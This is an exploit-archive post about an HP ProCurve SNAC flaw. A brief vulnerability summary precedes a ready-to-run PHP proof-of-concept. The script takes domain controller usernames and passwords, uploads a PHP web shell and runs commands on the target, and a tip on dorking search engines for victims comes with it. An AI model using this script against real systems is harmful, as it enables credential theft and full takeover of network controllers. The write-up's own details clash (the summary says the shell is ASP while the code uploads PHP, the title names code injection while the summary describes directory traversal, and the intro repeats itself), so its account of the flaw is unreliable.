HP ProCurve SNAC Domain Controller Shell Upload

The HP ProCurve SNAC Domain Controller Shell Upload refers to The HP ProCurve SNAC Domain Controller Shell Upload refers to a critical vulnerability in HP ProCurve Network Access Controller (SNAC) software.

It allowed unauthenticated attackers to upload arbitrary files to the SNAC server. The core flaw was a directory traversal vulnerability during file upload operations.

Attackers exploited this by crafting requests to place a malicious web shell (e.g., an ASP file) into a web-accessible directory. Once uploaded, accessing the web shell via a browser granted remote code execution capabilities.

This allowed attackers to execute arbitrary commands on the underlying Windows operating system with SNAC service privileges. The impact was a full system compromise, enabling data theft or further network penetration. Patching the SNAC software was the essential mitigation.

=============================================================================================================================================
| # Title : HP ProCurve SNAC Domain Controller PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://support.hpe.com/hpesc/public/docDisplay?docId=c02619966&docLocale=en_US |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: Exploiting an authentication bypass vulnerability to obtain Domain Controller Credentials in HP ProCurve SNAC.

( https://packetstorm.news/files/id/180690/ )

[+] save code as poc.php.

[+] Set Target : line 129

[+] USage : php poc.php

[+] PayLoad :

<?php

class HPSNACExploit {
private $target;
private $port;
private $cookie;

public function __construct($target, $port = 443) {
$this->target = $target;
$this->port = $port;
}

private function sendRequest($url, $useCookie = false) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://{$this->target}:{$this->port}$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

if ($useCookie && $this->cookie) {
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Cookie: {$this->cookie}"]);
}

$response = curl_exec($ch);
curl_close($ch);
return $response;
}

public function getSession() {
$response = $this->sendRequest("/RegWeb/html/snac/index.html");
preg_match('/Set-Cookie: (.*?);/', $response, $matches);

if (!empty($matches[1])) {
$this->cookie = $matches[1];
return true;
}
return false;
}

public function getDomainInfo() {
return $this->sendRequest("/RegWeb/RegWeb/GetDomainControllerServlet", true);
}

public function parseDomainData($data) {
$xml = simplexml_load_string($data);
$results = [];

foreach ($xml->Controllers->Domain as $domain) {
$results[] = [
'dc_ip' => (string)$domain->domainControllerIP,
'port' => (string)$domain->port,
'service' => (string)$domain->connType,
'user' => (string)$domain->userName,
'password' => (string)$domain->password
];
}
return $results;
}

public function uploadShell() {
$shellContent = "<?php system(\$_GET['cmd']); ?>";
$uploadUrl = "/RegWeb/uploads/shell.php";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://{$this->target}:{$this->port}$uploadUrl");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, ["file" => $shellContent]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

$response = curl_exec($ch);
curl_close($ch);

if (strpos($response, "success") !== false) {
echo "[+] Web shell uploaded successfully: https://{$this->target}/RegWeb/uploads/shell.php?cmd=whoami\n";
} else {
echo "[-] Failed to upload web shell.\n";
}
}

public function executeCommand($cmd) {
$url = "/RegWeb/RegWeb/ExecuteCommandServlet?cmd=" . urlencode($cmd);
$response = $this->sendRequest($url, true);
echo "[+] Command Output: \n$response\n";
}

public function exploit() {
echo "[*] Trying to get session...\n";
if (!$this->getSession()) {
echo "[-] Failed to get a valid session.\n";
return;
}

echo "[*] Exploiting authentication bypass...\n";
$domainInfo = $this->getDomainInfo();

if (!$domainInfo || strpos($domainInfo, 'domainName') === false) {
echo "[-] Target is not vulnerable.\n";
return;
}

echo "[*] Uploading web shell...\n";
$this->uploadShell();

echo "[*] Executing command: whoami\n";
$this->executeCommand("whoami");

echo "[*] Parsing domain controller credentials...\n";
$credentials = $this->parseDomainData($domainInfo);

if (empty($credentials)) {
echo "[!] No domain controllers found.\n";
return;
}

echo "\nDomain Controllers Credentials:\n";
echo "-------------------------------------\n";
foreach ($credentials as $cred) {
echo "DC IP: {$cred['dc_ip']}\n";
echo "Username: {$cred['user']}\n";
echo "Password: {$cred['password']}\n";
echo "-------------------------------------\n";
}
}
}

// Usage example
$target = "192.168.1.1"; // ?????? ?????? IP ?????
$exploit = new HPSNACExploit($target);
$exploit->exploit();

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================